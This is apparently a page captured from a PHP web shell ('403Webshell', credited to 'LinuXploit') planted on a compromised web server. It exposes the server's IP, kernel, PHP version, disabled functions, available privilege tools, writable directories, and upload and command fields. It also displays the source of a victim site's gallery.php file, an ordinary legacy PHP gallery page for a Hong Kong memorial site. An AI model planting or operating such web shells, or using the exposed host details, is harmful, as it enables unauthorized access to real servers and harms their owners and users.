403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/aa-lam.org/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/aa-lam.org/gallery.php
<?php require("admin/configure.php");
session_start();
if ( isset($_GET['parentid']) )
{
//$parentid 	= $_GET['parentid'];
$parentid =(int)$_GET['parentid'];
$_SESSION["pmenu"] = $parentid;
} else {
$parentid = $_SESSION["pmenu"];
}
//$parentid 	= $_GET['parentid'];
$galleryid =(int)$_GET['galleryid'];
$gallerycatid =(int)$_GET['gallerycatid'];

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>晞望 林俊晞生命見證 晞望成長坊</title>
<link rel="stylesheet" type="text/css" href="css/style.css" />
</head>

<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0">
<table width="980" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td><a href="index.php"><img src="images/home.jpg" width="980" height="55" border="0" /></a></td>
  </tr>
  <tr>
    <td><?php 
	if (($_SESSION["pmenu"] == '1') || ($_SESSION["pmenu"] == '2')){
	echo '<img src="images/pagebanner2.jpg" width="980" height="184" />';
	} else if ($_SESSION["pmenu"] == '3'){
	echo '<img src="images/pagebanner3.jpg" width="980" height="184" />';
	} else if ($_SESSION["pmenu"] == '4'){
	echo '<img src="images/pagebanner4.jpg" width="980" height="184" />';
	} else {
	echo '<img src="images/pagebanner.jpg" width="980" height="184" />';
	}
	?></td>
  </tr>
  <tr>
    <td><table width="980" border="0" cellpadding="0" cellspacing="0">
      <tr>
	  	<?
		$sql = " select * from categories where categories.parentid = '1' order by sortby limit 0, 1";
		$res = mysql_query($sql);
		$row = mysql_fetch_array($res);
		$template1 = $row["template"];
		?>
		<?
		$sql = " select * from categories where categories.parentid = '2' order by sortby limit 0, 1";
		$res = mysql_query($sql);
		$row = mysql_fetch_array($res);
		$template2 = $row["template"];
		?>
		<?
		$sql = " select * from categories where categories.parentid = '3' order by sortby limit 0, 1";
		$res = mysql_query($sql);
		$row = mysql_fetch_array($res);
		$template3 = $row["template"];
		?>
		<?
		$sql = " select * from categories where categories.parentid = '4' order by sortby limit 0, 1";
		$res = mysql_query($sql);
		$row = mysql_fetch_array($res);
		$template4 = $row["template"];
		?>
		<?
		$sql = " select * from news where news.status = 'Enable' order by newsdate desc limit 0, 1";
		$res = mysql_query($sql);
		$row = mysql_fetch_array($res);
		$new = $row["newsid"];
		?>
        <td><a href="<?=$template1?>"><img src="images/menu01.jpg" width="140" height="31" border="0" /></a></td>
        <td><a href="<?=$template2?>"><img src="images/menu02.jpg" width="140" height="31" border="0" /></a></td>
        <td><a href="<?=$template3?>"><img src="images/menu03.jpg" width="140" height="31" border="0" /></a></td>
        <td><a href="<?=$template4?>"><img src="images/menu04.jpg" width="140" height="31" border="0" /></a></td>
        <td><a href="guestbook.php"><img src="images/menu05.jpg" width="140" height="31" border="0" /></a></td>
        <td><a href="contactus.php"><img src="images/menu06.jpg" width="140" height="31" border="0" /></a></td>
        <td><a href="news.php?newsid=<?=$new?>"><img src="images/menu07.jpg" width="140" height="31" border="0" /></a></td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td height="7"></td>
  </tr>
  <tr>
    <td><table width="980" border="0" cellpadding="0" cellspacing="0">
	  <tr>
        <td width="280"><img src="images/gallery.jpg" width="280" height="33" /></td>
        <td width="700" align="left" valign="top">&nbsp;</td>
      </tr>
      <tr>
        <td height="350" align="left" valign="top" bgcolor="#F2F2F2">
		<ul class="slidedoormenu">
		<?
		$sql = "SELECT * ";
		$sql .= "FROM gallerycat ";
		$sql .= "order by gallerycatsort ASC, gallerycatid desc ";
//		echo $sql;
		$result1 = mysql_query($sql);
		while ($row = mysql_fetch_array($result1,MYSQL_ASSOC))
			{
			echo "<li><a href='gallery.php?gallerycatid=". $row{'gallerycatid'} ."'>". $row{'gallerycattype'} ."</a></li>";
			}
		?>
		</ul></td>
        <td align="right" valign="top"><table width="680" border="0" cellpadding="0" cellspacing="0">
          <? 
				$sql = "SELECT * ";
				$sql .= "FROM gallerycat ";
				$sql .= "where gallerycat.gallerycatid = '". $gallerycatid ."' ";

				$result = mysql_query($sql);
				$row = mysql_fetch_array($result,MYSQL_ASSOC);
		   ?>
		  <tr>
            <td height="45" align="left" valign="top" class="titletxt"><? echo $row{'gallerycattype'}; ?></td>
          </tr>
          <tr>
            <td align="left" valign="top" class="txt"><table width="680" border="0" cellpadding="0" cellspacing="0">
                 <?
					$sql = "SELECT * ";
					$sql .= "FROM gallery ";
					$sql .= "WHERE gallery.gallerycatid = '". $gallerycatid ."' ";
		
					$result = mysql_query($sql);
					$x = 1;
					while ($row = mysql_fetch_array($result,MYSQL_ASSOC))
					{	
						if ($x == 1 or $x%3 == 1)
						echo "<tr>";		
						echo "<td align='left' valign='middle'>";
						echo "<table width='200' border='0' cellpadding='0' cellspacing='0'>";
							   echo "<tr>";
							   ?>
							   <td width="200" align="center" valign="middle"><a href="admin/galleryphoto/<?=$row{'galleryfile'}?>" target="_blank"><img src="admin/galleryphoto/<?=$row{'galleryfile'}?>" border='0'  width='200' /></a></td>
							   <?
							   echo "</tr>";
							   echo "<tr>";
								  echo "<td height='15'></td>";
							   echo "</tr>";
						echo "</table>";
						echo "</td>";
		
						echo "<td align='left' valign='top' width='15'>";
						echo "&nbsp;";
						echo "</td>";
						
						if ($x%3==0)
							echo "</tr>";
		
						$x++;
					}	
					?> 
				  
                  <!--end here-->
                </table></td>
          </tr>
        </table>		</td>
      </tr>
      <tr>
        <td height="50" align="left" valign="top" bgcolor="#F2F2F2">&nbsp;</td>
        <td align="right" valign="top">&nbsp;</td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td align="center" class="footertxt"><p>Copyright © 2009 晞望 林俊晞生命見證 All Rights Reserved.  |   Sponsored by <a href="http://www.onesolution.com.hk" target="_blank">One Solution Limited</a>.<br />
      <a href="http://www.onesolution.com.hk" target="_blank"><img src="images/webicon137w23h.jpg" width="137" height="23" border="0" /></a> </p>
    </td>
  </tr>
</table>


</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit